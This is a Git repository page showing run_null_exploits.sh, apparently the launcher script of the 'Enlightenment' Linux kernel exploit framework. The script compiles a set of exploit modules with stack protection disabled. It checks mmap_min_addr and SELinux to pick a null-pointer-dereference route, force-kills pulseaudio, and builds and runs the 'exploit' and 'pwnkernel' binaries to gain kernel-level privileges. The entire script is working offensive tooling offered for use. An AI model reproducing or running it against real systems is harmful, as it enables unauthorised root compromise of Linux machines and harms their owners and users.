cadey
/
enlightenment
1
0
Fork 0
Code Issues Pull Requests Releases Wiki Activity
enlightenment/run_null_exploits.sh

78 lines
2.7 KiB
Bash
Executable File
Raw Permalink Blame History

#!/bin/sh
GCC=gcc
IS_64=`uname -m`
LINK_FLAG="-ldl"
OPT_FLAG="-fomit-frame-pointer -O2"
if [ "$IS_64" = "x86_64" ]; then
OPT_FLAG="-m64 -fomit-frame-pointer -O2"
fi
if [ "$1" != "" ]; then
OPT_FLAG="$OPT_FLAG -DNON_NULL_ONLY"
elif [ -d /usr/include/selinux ]; then
OPT_FLAG="$OPT_FLAG -DHAVE_SELINUX -lselinux"
fi
for FILE in exp_*.c; do
printf "Compiling $FILE..."
$GCC -fno-stack-protector -fPIC $OPT_FLAG -shared -o `printf $FILE | cut -d"." -f1`.so $FILE $LINK_FLAG 2> /dev/null
if [ "$?" = "1" ]; then
$GCC -fPIC $OPT_FLAG -shared -o `printf $FILE | cut -d"." -f1`.so $FILE $LINK_FLAG 2> /dev/null
if [ "$?" = "1" ]; then
printf "failed.\n"
else
printf "OK.\n"
fi
else
printf "OK.\n"
fi
done
ESCAPED_PWD=`pwd | sed 's/\//\\\\\//g'`
MINADDR=`cat /proc/sys/vm/mmap_min_addr 2> /dev/null`
if [ "$1" != "" -o "$MINADDR" = "" -o "$MINADDR" = "0" ]; then
sed "s/\/home\/spender/$ESCAPED_PWD/g" exploit.c > exploit1.c
mv exploit.c exploit2.c
mv exploit1.c exploit.c
$GCC -fno-stack-protector -fno-pie $OPT_FLAG -o exploit exploit.c $LINK_FLAG 2> /dev/null
if [ "$?" = "1" ]; then
$GCC -fno-stack-protector $OPT_FLAG -o exploit exploit.c $LINK_FLAG 2> /dev/null
fi
if [ "$?" = "1" ]; then
$GCC $OPT_FLAG -o exploit exploit.c $LINK_FLAG 2> /dev/null
fi
mv -f exploit2.c exploit.c
./exploit
elif [ ! -f '/selinux/enforce' ]; then
killall -9 pulseaudio 2> /dev/null
sed "s/\/home\/spender/$ESCAPED_PWD/g" exploit.c > exploit1.c
mv exploit.c exploit2.c
mv exploit1.c exploit.c
$GCC -fno-stack-protector -fno-pie -fPIC $OPT_FLAG -shared -o exploit.so exploit.c $LINK_FLAG 2> /dev/null
if [ "$?" = "1" ]; then
$GCC -fno-stack-protector -fPIC $OPT_FLAG -shared -o exploit.so exploit.c $LINK_FLAG 2> /dev/null
fi
if [ "$?" = "1" ]; then
$GCC -fPIC $OPT_FLAG -shared -o exploit.so exploit.c $LINK_FLAG 2> /dev/null
fi
mv -f exploit2.c exploit.c
sed "s/\/home\/spender/$ESCAPED_PWD/g" pwnkernel.c > pwnkernel1.c
mv pwnkernel.c pwnkernel2.c
mv pwnkernel1.c pwnkernel.c
$GCC $OPT_FLAG -o pwnkernel pwnkernel.c $LINK_FLAG
mv -f pwnkernel2.c pwnkernel.c
./pwnkernel
else
sed "s/\/home\/spender/$ESCAPED_PWD/g" exploit.c > exploit1.c
mv exploit.c exploit2.c
mv exploit1.c exploit.c
$GCC -fno-stack-protector -fno-pie $OPT_FLAG -o exploit exploit.c $LINK_FLAG 2> /dev/null
if [ "$?" = "1" ]; then
$GCC -fno-stack-protector $OPT_FLAG -o exploit exploit.c $LINK_FLAG 2> /dev/null
fi
if [ "$?" = "1" ]; then
$GCC $OPT_FLAG -o exploit exploit.c $LINK_FLAG 2> /dev/null
fi
mv -f exploit2.c exploit.c
./exploit
fi
Reference in New Issue View Git Blame Copy Permalink